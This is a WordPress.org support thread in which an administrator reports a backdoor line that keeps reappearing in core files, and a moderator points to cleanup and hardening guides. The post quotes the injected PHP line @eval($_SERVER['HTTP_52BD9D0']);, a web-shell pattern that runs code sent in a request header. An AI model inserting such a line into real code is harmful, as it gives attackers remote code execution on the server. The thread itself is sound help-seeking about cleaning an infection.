Malware repeatedly modifying random core files | WordPress.org

ssmithalignsoftcom
(@ssmithalignsoftcom)

2 years, 10 months ago

I’ve had an issue recently across a number of hosted sites where a line is being added to a seemingly random file in the wp-includes directory of the core files.

The added line is a variation of this: @eval($_SERVER[‘HTTP_52BD9D0’]);

If I remove it, it reappears. If I replace the entire WP install, the line is added again immediately.

I can’t find it in a plugin, Wordfence picks up the modification, but not the source. I’m assuming it’s in the database somewhere, but I can’t find where.

If I comment out that line, it puts the issue on pause – the entry isn’t uncommented, and isn’t added again. I’m assuming, being commented out, that it’s inert, but it’s still a concern.

Does anyone have any experience with this? Any idea where to find and remove it at the source?

Viewing 1 replies (of 1 total)

Moderator Steven Stern (sterndata)
(@sterndata)

Volunteer Forum Moderator

2 years, 10 months ago

Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures

https://wordpress.org/support/article/faq-my-site-was-hacked/

https://wordpress.org/support/article/hardening-wordpress/

If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

Viewing 1 replies (of 1 total)

The topic ‘Malware repeatedly modifying random core files’ is closed to new replies.

In: Fixing WordPress
1 reply
2 participants
Last reply from: Steven Stern (sterndata)
Last activity: 2 years, 10 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics